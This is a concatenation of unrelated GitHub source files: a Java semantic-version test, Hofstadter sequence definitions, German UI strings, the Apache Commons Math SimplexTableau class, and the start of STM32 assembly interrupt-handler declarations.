  public void testParse() throws Exception {
    assertEquals(new SemanticVersion(1, 8, 0), SemanticVersion.parse("1.8.0"));
    // a bare "rcN" suffix marks the version as unknown
    assertEquals(new SemanticVersion(1, 8, 0, true), SemanticVersion.parse("1.8.0rc3"));
    assertEquals(new SemanticVersion(1, 8, 0, "rc3", "SNAPSHOT", null),
        SemanticVersion.parse("1.8.0rc3-SNAPSHOT"));
    assertEquals(new SemanticVersion(1, 8, 0, null, "SNAPSHOT", null),
        SemanticVersion.parse("1.8.0-SNAPSHOT"));
    assertEquals(new SemanticVersion(1, 5, 0, null, "cdh5.5.0", null),
        SemanticVersion.parse("1.5.0-cdh5.5.0"));
  }

  /** Asserts that a sorts strictly before b, and symmetrically that b sorts after a. */
  private static void assertLessThan(String a, String b) throws SemanticVersion.SemanticVersionParseException {
    assertTrue(a + " should be < " + b, SemanticVersion.parse(a).compareTo(SemanticVersion.parse(b)) < 0);
    assertTrue(b + " should be > " + a, SemanticVersion.parse(b).compareTo(SemanticVersion.parse(a)) > 0);
  }

  /** Asserts that a and b have equal precedence. */
  private static void assertEqualTo(String a, String b) throws SemanticVersion.SemanticVersionParseException {
    assertTrue(a + " should equal " + b, SemanticVersion.parse(a).compareTo(SemanticVersion.parse(b)) == 0);
  }
}
|
{
"pile_set_name": "Github"
}
|
% Mutually recursive "Female" (F) and "Male" (M) sequences (Hofstadter).
% Each takes an integer n on the stack and replaces it with F(n) / M(n).
/F {
  {
    {0 eq} {pop 1} is?              % base case: F(0) = 1
    {0 gt} {dup 1 sub F M sub} is?  % F(n) = n - M(F(n - 1))
  } cond
}.
/M {
  {
    {0 eq} {pop 0} is?              % base case: M(0) = 0
    {0 gt} {dup 1 sub M F sub} is?  % M(n) = n - F(M(n - 1))
  } cond
}.
|
{
"pile_set_name": "Github"
}
|
# German version of language dependent text of the class WindowClearanceClass
title = Clearance-Matrix
layer = Lage:
layer_tooltip = Lage einstellen, wo die Werte der Clearance-Matrix geändert werden können
add_class = Klasse hinzufügen
add_class_tooltip = Eine neue Clearance-Klasse Klasse hinzufügen
prune = Trimmen
prune_tooltip = Redundante Klassen löschen
new_name = Bitte geben Sie den Namen der neuen Klasse ein
confirm_remove = Bitte bestätigen Sie das Löschen der Klasse
class = Klasse
the_class = der Klasse
the_classes = den Klassen
and = und
already_assigned = Objekte sind schon zugewiesen zu
change_anyway = !\nClearance-Regel trotzdem ändern?
|
{
"pile_set_name": "Github"
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.commons.math4.optim.linear;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.TreeSet;
import org.apache.commons.math4.exception.DimensionMismatchException;
import org.apache.commons.math4.linear.Array2DRowRealMatrix;
import org.apache.commons.math4.linear.MatrixUtils;
import org.apache.commons.math4.linear.RealVector;
import org.apache.commons.math4.optim.PointValuePair;
import org.apache.commons.math4.optim.nonlinear.scalar.GoalType;
import org.apache.commons.numbers.core.Precision;
/**
* A tableau for use in the Simplex method.
*
* <p>
* Example:
* <pre>
* W | Z | x1 | x2 | x- | s1 | s2 | a1 | RHS
* ---------------------------------------------------
* -1 0 0 0 0 0 0 1 0 <= phase 1 objective
* 0 1 -15 -10 0 0 0 0 0 <= phase 2 objective
* 0 0 1 0 0 1 0 0 2 <= constraint 1
* 0 0 0 1 0 0 1 0 3 <= constraint 2
* 0 0 1 1 0 0 0 1 4 <= constraint 3
* </pre>
* W: Phase 1 objective function<br>
* Z: Phase 2 objective function<br>
* x1 & x2: Decision variables<br>
* x-: Extra decision variable to allow for negative values<br>
* s1 & s2: Slack/Surplus variables<br>
* a1: Artificial variable<br>
* RHS: Right hand side<br>
*
* Note on usage and safety:
* The class is package private. It is not meant for public usage.
* The core data structure, the tableau field, is mutated internally and
* even reallocated when necessary.
* Proper usage of this class is demonstrated in SimplexSolver,
* where the class is only ever constructed in a method (never a field
* of an object), and its lifetime, is therefore bound to a single thread (the
* thread that's invoking the method).
*
* @since 2.0
*/
class SimplexTableau implements Serializable {

    /** Column label for the extra variable that models negative values ("x-"). */
    private static final String NEGATIVE_VAR_COLUMN_LABEL = "x-";

    /** Serializable version identifier. */
    private static final long serialVersionUID = -1369660067587938365L;

    /** Bit mask selecting the 11 exponent bits of an IEEE-754 double. */
    private static final long EXPN = 0x7ff0000000000000L;

    /** Bit mask selecting the sign and 52 mantissa bits of an IEEE-754 double. */
    private static final long FRAC = 0x800fffffffffffffL;

    /** Maximum raw IEEE exponent value (all exponent bits set). */
    private static final int MAX_IEEE_EXP = 2047;

    /** Minimum raw IEEE exponent value (all exponent bits clear). */
    private static final int MIN_IEEE_EXP = 0;

    /** The IEEE exponent is biased: a stored value of 1023 means 2^0. */
    private static final int OFFSET_IEEE_EXP = 1023;

    /** Number of bits the exponent field is shifted left in the IEEE layout. */
    private static final int IEEE_EXPONENT_SHIFT = 52;

    /** Linear objective function. */
    private final LinearObjectiveFunction f;

    /** Linear constraints (normalized so every right hand side is non-negative). */
    private final List<LinearConstraint> constraints;

    /** Whether to restrict the variables to non-negative values. */
    private final boolean restrictToNonNegative;

    /** The variables each column represents. */
    private final List<String> columnLabels = new ArrayList<>();

    /** Simple tableau. Mutated in place and reallocated by {@link #dropPhase1Objective()};
     *  transient because it is (de)serialized explicitly in writeObject/readObject. */
    private transient Array2DRowRealMatrix tableau;

    /** Number of decision variables. */
    private final int numDecisionVariables;

    /** Number of slack variables. */
    private final int numSlackVariables;

    /** Number of artificial variables (reset to 0 when phase 1 is dropped). */
    private int numArtificialVariables;

    /** Amount of error to accept when checking for optimality. */
    private final double epsilon;

    /** Amount of error to accept in floating point comparisons. */
    private final int maxUlps;

    /** Maps basic variables (columns) to the row they are basic in; -1 means non-basic. */
    private int[] basicVariables;

    /** Maps rows to their corresponding basic variables. */
    private int[] basicRows;

    /** Per-column change of floating point exponent applied when scaling the input;
     *  undone in {@link #getSolution()}. */
    private int[] variableExpChange;

    /**
     * Builds a tableau for a linear problem.
     *
     * @param f Linear objective function.
     * @param constraints Linear constraints.
     * @param goalType Optimization goal: either {@link GoalType#MAXIMIZE}
     * or {@link GoalType#MINIMIZE}.
     * @param restrictToNonNegative Whether to restrict the variables to non-negative values.
     * @param epsilon Amount of error to accept when checking for optimality.
     * @throws DimensionMismatchException if the dimension of the constraints does not match the
     * dimension of the objective function
     */
    SimplexTableau(final LinearObjectiveFunction f,
                   final Collection<LinearConstraint> constraints,
                   final GoalType goalType,
                   final boolean restrictToNonNegative,
                   final double epsilon) {
        this(f, constraints, goalType, restrictToNonNegative, epsilon, SimplexSolver.DEFAULT_ULPS);
    }

    /**
     * Build a tableau for a linear problem.
     * @param f linear objective function
     * @param constraints linear constraints
     * @param goalType type of optimization goal: either {@link GoalType#MAXIMIZE} or {@link GoalType#MINIMIZE}
     * @param restrictToNonNegative whether to restrict the variables to non-negative values
     * @param epsilon amount of error to accept when checking for optimality
     * @param maxUlps amount of error to accept in floating point comparisons
     * @throws DimensionMismatchException if the dimension of the constraints does not match the
     * dimension of the objective function
     */
    SimplexTableau(final LinearObjectiveFunction f,
                   final Collection<LinearConstraint> constraints,
                   final GoalType goalType,
                   final boolean restrictToNonNegative,
                   final double epsilon,
                   final int maxUlps) throws DimensionMismatchException {
        checkDimensions(f, constraints);
        this.f = f;
        this.constraints = normalizeConstraints(constraints);
        this.restrictToNonNegative = restrictToNonNegative;
        this.epsilon = epsilon;
        this.maxUlps = maxUlps;
        // One extra decision variable ("x-") is added when negatives are allowed.
        this.numDecisionVariables = f.getCoefficients().getDimension() + (restrictToNonNegative ? 0 : 1);
        this.numSlackVariables = getConstraintTypeCounts(Relationship.LEQ) +
                getConstraintTypeCounts(Relationship.GEQ);
        this.numArtificialVariables = getConstraintTypeCounts(Relationship.EQ) +
                getConstraintTypeCounts(Relationship.GEQ);
        this.tableau = createTableau(goalType == GoalType.MAXIMIZE);
        // initialize the basic variables for phase 1:
        // we know that only slack or artificial variables can be basic
        initializeBasicVariables(getSlackVariableOffset());
        initializeColumnLabels();
    }

    /**
     * Checks that the dimensions of the objective function and the constraints match.
     * @param objectiveFunction the objective function
     * @param c the set of constraints
     * @throws DimensionMismatchException if the constraint dimensions do not match with the
     * dimension of the objective function
     */
    private void checkDimensions(final LinearObjectiveFunction objectiveFunction,
                                 final Collection<LinearConstraint> c) {
        final int dimension = objectiveFunction.getCoefficients().getDimension();
        for (final LinearConstraint constraint : c) {
            final int constraintDimension = constraint.getCoefficients().getDimension();
            if (constraintDimension != dimension) {
                throw new DimensionMismatchException(constraintDimension, dimension);
            }
        }
    }

    /**
     * Initialize the labels for the columns, in the same order the columns were
     * laid out by {@link #createTableau(boolean)}.
     */
    protected void initializeColumnLabels() {
        if (getNumObjectiveFunctions() == 2) {
            columnLabels.add("W");
        }
        columnLabels.add("Z");
        for (int i = 0; i < getOriginalNumDecisionVariables(); i++) {
            columnLabels.add("x" + i);
        }
        if (!restrictToNonNegative) {
            columnLabels.add(NEGATIVE_VAR_COLUMN_LABEL);
        }
        for (int i = 0; i < getNumSlackVariables(); i++) {
            columnLabels.add("s" + i);
        }
        for (int i = 0; i < getNumArtificialVariables(); i++) {
            columnLabels.add("a" + i);
        }
        columnLabels.add("RHS");
    }

    /**
     * Create the tableau by itself.
     * @param maximize if true, goal is to maximize the objective function
     * @return created tableau
     */
    protected Array2DRowRealMatrix createTableau(final boolean maximize) {
        // create a matrix of the correct size
        int width = numDecisionVariables + numSlackVariables +
                numArtificialVariables + getNumObjectiveFunctions() + 1; // + 1 is for RHS
        int height = constraints.size() + getNumObjectiveFunctions();
        Array2DRowRealMatrix matrix = new Array2DRowRealMatrix(height, width);
        // initialize the objective function rows
        if (getNumObjectiveFunctions() == 2) {
            matrix.setEntry(0, 0, -1);
        }
        int zIndex = (getNumObjectiveFunctions() == 1) ? 0 : 1;
        matrix.setEntry(zIndex, zIndex, maximize ? 1 : -1);
        // Gather the objective row (index 0) and all constraint rows so they can be
        // scaled together before being copied into the matrix.
        double[][] scaled = new double[constraints.size() + 1][];
        RealVector objectiveCoefficients = maximize ? f.getCoefficients().mapMultiply(-1) : f.getCoefficients();
        scaled[0] = objectiveCoefficients.toArray();
        double[] scaledRhs = new double[constraints.size() + 1];
        double value = maximize ? f.getConstantTerm() : -1 * f.getConstantTerm();
        scaledRhs[0] = value;
        for (int i = 0; i < constraints.size(); i++) {
            LinearConstraint constraint = constraints.get(i);
            scaled[i + 1] = constraint.getCoefficients().toArray();
            scaledRhs[i + 1] = constraint.getValue();
        }
        variableExpChange = new int[scaled[0].length];
        scale(scaled, scaledRhs);
        copyArray(scaled[0], matrix.getDataRef()[zIndex]);
        matrix.setEntry(zIndex, width - 1, scaledRhs[0]);
        if (!restrictToNonNegative) {
            matrix.setEntry(zIndex, getSlackVariableOffset() - 1,
                    getInvertedCoefficientSum(scaled[0]));
        }
        // initialize the constraint rows
        int slackVar = 0;
        int artificialVar = 0;
        for (int i = 0; i < constraints.size(); i++) {
            final LinearConstraint constraint = constraints.get(i);
            final int row = getNumObjectiveFunctions() + i;
            // decision variable coefficients
            copyArray(scaled[i + 1], matrix.getDataRef()[row]);
            // x-
            if (!restrictToNonNegative) {
                matrix.setEntry(row, getSlackVariableOffset() - 1,
                        getInvertedCoefficientSum(scaled[i + 1]));
            }
            // RHS
            matrix.setEntry(row, width - 1, scaledRhs[i + 1]);
            // slack variables
            if (constraint.getRelationship() == Relationship.LEQ) {
                matrix.setEntry(row, getSlackVariableOffset() + slackVar++, 1);  // slack
            } else if (constraint.getRelationship() == Relationship.GEQ) {
                matrix.setEntry(row, getSlackVariableOffset() + slackVar++, -1); // excess
            }
            // artificial variables: add one per EQ/GEQ constraint and subtract the
            // constraint row from the phase-1 objective row so the artificial
            // variable starts out basic with a zero reduced cost.
            if ((constraint.getRelationship() == Relationship.EQ) ||
                    (constraint.getRelationship() == Relationship.GEQ)) {
                matrix.setEntry(0, getArtificialVariableOffset() + artificialVar, 1);
                matrix.setEntry(row, getArtificialVariableOffset() + artificialVar++, 1);
                matrix.setRowVector(0, matrix.getRowVector(0).subtract(matrix.getRowVector(row)));
            }
        }
        return matrix;
    }

    /** We scale the constants in the equations and objective, which means we try
     * to get the IEEE double exponent as close to zero (1023) as possible, which makes the
     * constants closer to 1.
     * We use exponent shifts instead of division because that introduces no bit errors.
     *
     * @param scaled coefficients before scaling (row 0 is the objective)
     * @param scaledRhs right hand side before scaling
     */
    private void scale(double[][] scaled, double[] scaledRhs) {
        /*
        first transform across:
        c0 x0 + c1 x1 + ... + cn xn = vn ==> (2^expChange) * (c0 x0 + c1 x1 + ... + cn xn = vn)
        expChange will be negative if the constants are larger than 1,
        it'll be positive if the constants are less than 1.
        */
        for (int i = 0; i < scaled.length; i++) {
            // Track the min/max raw exponent over the non-zero entries of row i,
            // including its right hand side; zeros are skipped since their
            // exponent field carries no information.
            int minExp = MAX_IEEE_EXP + 1;
            int maxExp = MIN_IEEE_EXP - 1;
            for (double d: scaled[i]) {
                if (d != 0) {
                    int e = exponent(d);
                    if (e < minExp) {
                        minExp = e;
                    }
                    if (e > maxExp) {
                        maxExp = e;
                    }
                }
            }
            if (scaledRhs[i] != 0) {
                final int e = exponent(scaledRhs[i]);
                if (e < minExp) {
                    minExp = e;
                }
                if (e > maxExp) {
                    maxExp = e;
                }
            }
            final int expChange = computeExpChange(minExp, maxExp);
            if (expChange != 0) {
                scaledRhs[i] = updateExponent(scaledRhs[i], expChange);
                updateExponent(scaled[i], expChange);
            }
        }
        /*
        second, transform down the columns. this is like defining a new variable for that column
        that is yi = xi * (2^expChange)
        After solving for yi, we compute xi by shifting again. See getSolution()
        */
        for (int i = 0; i < variableExpChange.length; i++) {
            int minExp = MAX_IEEE_EXP + 1;
            int maxExp = MIN_IEEE_EXP - 1;
            for (double[] coefficients : scaled) {
                final double d = coefficients[i];
                if (d != 0) {
                    int e = exponent(d);
                    if (e < minExp) {
                        minExp = e;
                    }
                    if (e > maxExp) {
                        maxExp = e;
                    }
                }
            }
            final int expChange = computeExpChange(minExp, maxExp);
            variableExpChange[i] = expChange;
            if (expChange != 0) {
                for (double[] coefficients : scaled) {
                    coefficients[i] = updateExponent(coefficients[i], expChange);
                }
            }
        }
    }

    /**
     * Given the minimum and maximum value of the exponent of two {@code double}
     * values, pick a change in exponent to bring those values closer to 1.
     * Only one bound is corrected: if the smallest exponent is above the bias the
     * whole row/column is shifted down; otherwise, if the largest is below the
     * bias, it is shifted up. If min and max straddle the bias no change is made.
     *
     * @param minExp Smallest exponent.
     * @param maxExp Largest exponent.
     * @return the exponent delta to apply (0 when no scaling is useful).
     */
    private int computeExpChange(int minExp, int maxExp) {
        int expChange = 0;
        if (minExp <= MAX_IEEE_EXP &&
                minExp > OFFSET_IEEE_EXP) {
            expChange = OFFSET_IEEE_EXP - minExp;
        } else if (maxExp >= MIN_IEEE_EXP &&
                maxExp < OFFSET_IEEE_EXP) {
            expChange = OFFSET_IEEE_EXP - maxExp;
        }
        return expChange;
    }

    /**
     * Changes the exponent of every member of the array by the given amount.
     *
     * @param dar array of doubles to change in place
     * @param exp exponent delta to apply to each element
     */
    private static void updateExponent(double[] dar, int exp) {
        for (int i = 0; i < dar.length; i++) {
            dar[i] = updateExponent(dar[i], exp);
        }
    }

    /**
     * Extract the exponent of a {@code double}.
     *
     * @param d value to extract the exponent from
     * @return the raw (biased) IEEE exponent field, as an integer in [0, 2047]
     */
    private static int exponent(double d) {
        final long bits = Double.doubleToLongBits(d);
        return (int) ((bits & EXPN) >>> IEEE_EXPONENT_SHIFT);
    }

    /**
     * Changes the exponent of a number by the given amount, i.e. multiplies it
     * by an exact power of two without touching the mantissa.
     * NOTE(review): assumes the adjusted exponent stays within the normal range;
     * callers derive {@code exp} from {@link #computeExpChange(int, int)} which
     * moves values toward the bias, presumably keeping the result in range — confirm.
     *
     * @param d value to change
     * @param exp exponent to add to the existing exponent (may be negative)
     * @return a double with the same sign/mantissa bits as d, but exponent changed by exp
     */
    private static double updateExponent(double d, int exp) {
        if (d == 0 ||
                exp == 0) {
            return d;
        }
        final long bits = Double.doubleToLongBits(d);
        return Double.longBitsToDouble((bits & FRAC) | ((((bits & EXPN) >>> IEEE_EXPONENT_SHIFT) + exp) << IEEE_EXPONENT_SHIFT));
    }

    /**
     * Get new versions of the constraints which have positive right hand sides.
     * @param originalConstraints original (not normalized) constraints
     * @return new versions of the constraints
     */
    public List<LinearConstraint> normalizeConstraints(Collection<LinearConstraint> originalConstraints) {
        final List<LinearConstraint> normalized = new ArrayList<>(originalConstraints.size());
        for (LinearConstraint constraint : originalConstraints) {
            normalized.add(normalize(constraint));
        }
        return normalized;
    }

    /**
     * Get a new equation equivalent to this one with a positive right hand side.
     * Negating both sides flips the relationship (LEQ &lt;-&gt; GEQ).
     * @param constraint reference constraint
     * @return new equation
     */
    private LinearConstraint normalize(final LinearConstraint constraint) {
        if (constraint.getValue() < 0) {
            return new LinearConstraint(constraint.getCoefficients().mapMultiply(-1),
                    constraint.getRelationship().oppositeRelationship(),
                    -1 * constraint.getValue());
        }
        return new LinearConstraint(constraint.getCoefficients(),
                constraint.getRelationship(), constraint.getValue());
    }

    /**
     * Get the number of objective functions in this tableau.
     * @return 2 for Phase 1. 1 for Phase 2.
     */
    protected final int getNumObjectiveFunctions() {
        return this.numArtificialVariables > 0 ? 2 : 1;
    }

    /**
     * Get a count of constraints corresponding to a specified relationship.
     * @param relationship relationship to count
     * @return number of constraint with the specified relationship
     */
    private int getConstraintTypeCounts(final Relationship relationship) {
        int count = 0;
        for (final LinearConstraint constraint : constraints) {
            if (constraint.getRelationship() == relationship) {
                ++count;
            }
        }
        return count;
    }

    /**
     * Get the -1 times the sum of all coefficients in the given array.
     * @param coefficients coefficients to sum
     * @return the -1 times the sum of all coefficients in the given array.
     */
    private static double getInvertedCoefficientSum(final double[] coefficients) {
        double sum = 0;
        for (double coefficient : coefficients) {
            sum -= coefficient;
        }
        return sum;
    }

    /**
     * Checks whether the given column is basic.
     * @param col index of the column to check
     * @return the row that the variable is basic in. null if the column is not basic
     */
    protected Integer getBasicRow(final int col) {
        final int row = basicVariables[col];
        return row == -1 ? null : row;
    }

    /**
     * Returns the variable that is basic in this row.
     * @param row the index of the row to check
     * @return the variable that is basic for this row.
     */
    protected int getBasicVariable(final int row) {
        return basicRows[row];
    }

    /**
     * Initializes the basic variable / row mapping.
     * @param startColumn the column to start at (columns before it are known non-basic)
     */
    private void initializeBasicVariables(final int startColumn) {
        basicVariables = new int[getWidth() - 1];
        basicRows = new int[getHeight()];
        Arrays.fill(basicVariables, -1);
        for (int i = startColumn; i < getWidth() - 1; i++) {
            Integer row = findBasicRow(i);
            if (row != null) {
                basicVariables[i] = row;
                basicRows[row] = i;
            }
        }
    }

    /**
     * Returns the row in which the given column is basic, i.e. the column holds
     * exactly one entry equal to 1 and zeros elsewhere (within maxUlps).
     * @param col index of the column
     * @return the row that the variable is basic in, or {@code null} if the variable is not basic.
     */
    private Integer findBasicRow(final int col) {
        Integer row = null;
        for (int i = 0; i < getHeight(); i++) {
            final double entry = getEntry(i, col);
            if (Precision.equals(entry, 1d, maxUlps) && (row == null)) {
                row = i;
            } else if (!Precision.equals(entry, 0d, maxUlps)) {
                return null;
            }
        }
        return row;
    }

    /**
     * Removes the phase 1 objective function, positive cost non-artificial variables,
     * and the non-basic artificial variables from this tableau.
     */
    protected void dropPhase1Objective() {
        if (getNumObjectiveFunctions() == 1) {
            return;
        }
        // TreeSet keeps the columns sorted so they can be removed back-to-front below.
        final Set<Integer> columnsToDrop = new TreeSet<>();
        columnsToDrop.add(0);
        // positive cost non-artificial variables
        for (int i = getNumObjectiveFunctions(); i < getArtificialVariableOffset(); i++) {
            final double entry = getEntry(0, i);
            if (Precision.compareTo(entry, 0d, epsilon) > 0) {
                columnsToDrop.add(i);
            }
        }
        // non-basic artificial variables
        for (int i = 0; i < getNumArtificialVariables(); i++) {
            int col = i + getArtificialVariableOffset();
            if (getBasicRow(col) == null) {
                columnsToDrop.add(col);
            }
        }
        // Rebuild the matrix without row 0 (phase 1 objective) and the dropped columns.
        final double[][] matrix = new double[getHeight() - 1][getWidth() - columnsToDrop.size()];
        for (int i = 1; i < getHeight(); i++) {
            int col = 0;
            for (int j = 0; j < getWidth(); j++) {
                if (!columnsToDrop.contains(j)) {
                    matrix[i - 1][col++] = getEntry(i, j);
                }
            }
        }
        // remove the columns in reverse order so the indices are correct
        Integer[] drop = columnsToDrop.toArray(new Integer[columnsToDrop.size()]);
        for (int i = drop.length - 1; i >= 0; i--) {
            columnLabels.remove((int) drop[i]);
        }
        this.tableau = new Array2DRowRealMatrix(matrix);
        this.numArtificialVariables = 0;
        // need to update the basic variable mappings as row/columns have been dropped
        initializeBasicVariables(getNumObjectiveFunctions());
    }

    /**
     * Copies the given coefficients into a tableau row, leaving room at the
     * start of the row for the objective function column(s).
     * @param src the source array
     * @param dest the destination array
     */
    private void copyArray(final double[] src, final double[] dest) {
        System.arraycopy(src, 0, dest, getNumObjectiveFunctions(), src.length);
    }

    /**
     * Returns whether the problem is at an optimal state, i.e. no entry of the
     * objective row (excluding the RHS) is negative beyond epsilon.
     * @return whether the model has been solved
     */
    boolean isOptimal() {
        final double[] objectiveFunctionRow = getRow(0);
        final int end = getRhsOffset();
        for (int i = getNumObjectiveFunctions(); i < end; i++) {
            final double entry = objectiveFunctionRow[i];
            if (Precision.compareTo(entry, 0d, epsilon) < 0) {
                return false;
            }
        }
        return true;
    }

    /**
     * Get the current solution, undoing the per-variable exponent scaling
     * applied by {@link #scale(double[][], double[])}.
     * @return current solution
     */
    protected PointValuePair getSolution() {
        // NOTE(review): "> 0" relies on the "x-" label never being at index 0;
        // columns 0..(numObjectiveFunctions-1) are always "W"/"Z" labels, so
        // indexOf can only return -1 or a value >= 1 here.
        int negativeVarColumn = columnLabels.indexOf(NEGATIVE_VAR_COLUMN_LABEL);
        Integer negativeVarBasicRow = negativeVarColumn > 0 ? getBasicRow(negativeVarColumn) : null;
        double mostNegative = negativeVarBasicRow == null ? 0 : getEntry(negativeVarBasicRow, getRhsOffset());
        final Set<Integer> usedBasicRows = new HashSet<>();
        final double[] coefficients = new double[getOriginalNumDecisionVariables()];
        for (int i = 0; i < coefficients.length; i++) {
            int colIndex = columnLabels.indexOf("x" + i);
            if (colIndex < 0) {
                // the column was dropped in dropPhase1Objective(): value is 0
                coefficients[i] = 0;
                continue;
            }
            Integer basicRow = getBasicRow(colIndex);
            if (basicRow != null && basicRow == 0) {
                // if the basic row is found to be the objective function row
                // set the coefficient to 0 -> this case handles unconstrained
                // variables that are still part of the objective function
                coefficients[i] = 0;
            } else if (usedBasicRows.contains(basicRow)) {
                // if multiple variables can take a given value
                // then we choose the first and set the rest equal to 0
                coefficients[i] = 0 - (restrictToNonNegative ? 0 : mostNegative);
            } else {
                usedBasicRows.add(basicRow);
                coefficients[i] =
                        (basicRow == null ? 0 : getEntry(basicRow, getRhsOffset())) -
                                (restrictToNonNegative ? 0 : mostNegative);
            }
            // undo the column scaling: xi = yi * 2^expChange
            coefficients[i] = updateExponent(coefficients[i], variableExpChange[i]);
        }
        return new PointValuePair(coefficients, f.value(coefficients));
    }

    /**
     * Perform the row operations of the simplex algorithm with the selected
     * pivot column and row.
     * @param pivotCol the pivot column
     * @param pivotRow the pivot row
     */
    protected void performRowOperations(int pivotCol, int pivotRow) {
        // set the pivot element to 1
        final double pivotVal = getEntry(pivotRow, pivotCol);
        divideRow(pivotRow, pivotVal);
        // set the rest of the pivot column to 0
        for (int i = 0; i < getHeight(); i++) {
            if (i != pivotRow) {
                final double multiplier = getEntry(i, pivotCol);
                if (multiplier != 0.0) {
                    subtractRow(i, pivotRow, multiplier);
                }
            }
        }
        // update the basic variable mappings: the entering variable replaces
        // the variable that was previously basic in the pivot row
        final int previousBasicVariable = getBasicVariable(pivotRow);
        basicVariables[previousBasicVariable] = -1;
        basicVariables[pivotCol] = pivotRow;
        basicRows[pivotRow] = pivotCol;
    }

    /**
     * Divides one row by a given divisor.
     * <p>
     * After application of this operation, the following will hold:
     * <pre>dividendRow = dividendRow / divisor</pre>
     *
     * @param dividendRowIndex index of the row
     * @param divisor value of the divisor
     */
    protected void divideRow(final int dividendRowIndex, final double divisor) {
        final double[] dividendRow = getRow(dividendRowIndex);
        for (int j = 0; j < getWidth(); j++) {
            dividendRow[j] /= divisor;
        }
    }

    /**
     * Subtracts a multiple of one row from another.
     * <p>
     * After application of this operation, the following will hold:
     * <pre>minuendRow = minuendRow - multiple * subtrahendRow</pre>
     *
     * @param minuendRowIndex row index
     * @param subtrahendRowIndex row index
     * @param multiplier multiplication factor
     */
    protected void subtractRow(final int minuendRowIndex, final int subtrahendRowIndex, final double multiplier) {
        final double[] minuendRow = getRow(minuendRowIndex);
        final double[] subtrahendRow = getRow(subtrahendRowIndex);
        for (int i = 0; i < getWidth(); i++) {
            minuendRow[i] -= subtrahendRow[i] * multiplier;
        }
    }

    /**
     * Get the width of the tableau.
     * @return width of the tableau
     */
    protected final int getWidth() {
        return tableau.getColumnDimension();
    }

    /**
     * Get the height of the tableau.
     * @return height of the tableau
     */
    protected final int getHeight() {
        return tableau.getRowDimension();
    }

    /**
     * Get an entry of the tableau.
     * @param row row index
     * @param column column index
     * @return entry at (row, column)
     */
    protected final double getEntry(final int row, final int column) {
        return tableau.getEntry(row, column);
    }

    /**
     * Set an entry of the tableau.
     * @param row row index
     * @param column column index
     * @param value for the entry
     */
    protected final void setEntry(final int row, final int column, final double value) {
        tableau.setEntry(row, column, value);
    }

    /**
     * Get the offset of the first slack variable.
     * @return offset of the first slack variable
     */
    protected final int getSlackVariableOffset() {
        return getNumObjectiveFunctions() + numDecisionVariables;
    }

    /**
     * Get the offset of the first artificial variable.
     * @return offset of the first artificial variable
     */
    protected final int getArtificialVariableOffset() {
        return getNumObjectiveFunctions() + numDecisionVariables + numSlackVariables;
    }

    /**
     * Get the offset of the right hand side.
     * @return offset of the right hand side
     */
    protected final int getRhsOffset() {
        return getWidth() - 1;
    }

    /**
     * Get the number of decision variables.
     * <p>
     * If variables are not restricted to positive values, this will include 1 extra decision variable to represent
     * the absolute value of the most negative variable.
     *
     * @return number of decision variables
     * @see #getOriginalNumDecisionVariables()
     */
    protected final int getNumDecisionVariables() {
        return numDecisionVariables;
    }

    /**
     * Get the original number of decision variables.
     * @return original number of decision variables
     * @see #getNumDecisionVariables()
     */
    protected final int getOriginalNumDecisionVariables() {
        return f.getCoefficients().getDimension();
    }

    /**
     * Get the number of slack variables.
     * @return number of slack variables
     */
    protected final int getNumSlackVariables() {
        return numSlackVariables;
    }

    /**
     * Get the number of artificial variables.
     * @return number of artificial variables
     */
    protected final int getNumArtificialVariables() {
        return numArtificialVariables;
    }

    /**
     * Get the row from the tableau.
     * @param row the row index
     * @return the reference to the underlying row data (mutations affect the tableau)
     */
    protected final double[] getRow(int row) {
        return tableau.getDataRef()[row];
    }

    /**
     * Get the tableau data.
     * @return a copy of the tableau data
     */
    protected final double[][] getData() {
        return tableau.getData();
    }

    /** {@inheritDoc} */
    @Override
    public boolean equals(Object other) {
        if (this == other) {
            return true;
        }
        if (other instanceof SimplexTableau) {
            SimplexTableau rhs = (SimplexTableau) other;
            return (restrictToNonNegative == rhs.restrictToNonNegative) &&
                    (numDecisionVariables == rhs.numDecisionVariables) &&
                    (numSlackVariables == rhs.numSlackVariables) &&
                    (numArtificialVariables == rhs.numArtificialVariables) &&
                    (epsilon == rhs.epsilon) &&
                    (maxUlps == rhs.maxUlps) &&
                    f.equals(rhs.f) &&
                    constraints.equals(rhs.constraints) &&
                    tableau.equals(rhs.tableau);
        }
        return false;
    }

    /** {@inheritDoc} */
    @Override
    public int hashCode() {
        return Boolean.valueOf(restrictToNonNegative).hashCode() ^
                numDecisionVariables ^
                numSlackVariables ^
                numArtificialVariables ^
                Double.valueOf(epsilon).hashCode() ^
                maxUlps ^
                f.hashCode() ^
                constraints.hashCode() ^
                tableau.hashCode();
    }

    /**
     * Serialize the instance. The transient tableau matrix is written explicitly.
     * @param oos stream where object should be written
     * @throws IOException if object cannot be written to stream
     */
    private void writeObject(ObjectOutputStream oos)
            throws IOException {
        oos.defaultWriteObject();
        MatrixUtils.serializeRealMatrix(tableau, oos);
    }

    /**
     * Deserialize the instance. The transient tableau matrix is restored explicitly.
     * @param ois stream from which the object should be read
     * @throws ClassNotFoundException if a class in the stream cannot be found
     * @throws IOException if object cannot be read from the stream
     */
    private void readObject(ObjectInputStream ois)
            throws ClassNotFoundException, IOException {
        ois.defaultReadObject();
        MatrixUtils.deserializeRealMatrix(this, "tableau", ois);
    }
}
|
{
"pile_set_name": "Github"
}
|
/* STM32 ISR weak declarations */
.thumb
/* Default handler for all non-overridden interrupts and exceptions */
.globl __default_handler
.type __default_handler, %function
__default_handler:
b .
.weak __exc_nmi
.globl __exc_nmi
.set __exc_nmi, __default_handler
.weak __exc_hardfault
.globl __exc_hardfault
.set __exc_hardfault, __default_handler
.weak __exc_memmanage
.globl __exc_memmanage
.set __exc_memmanage, __default_handler
.weak __exc_busfault
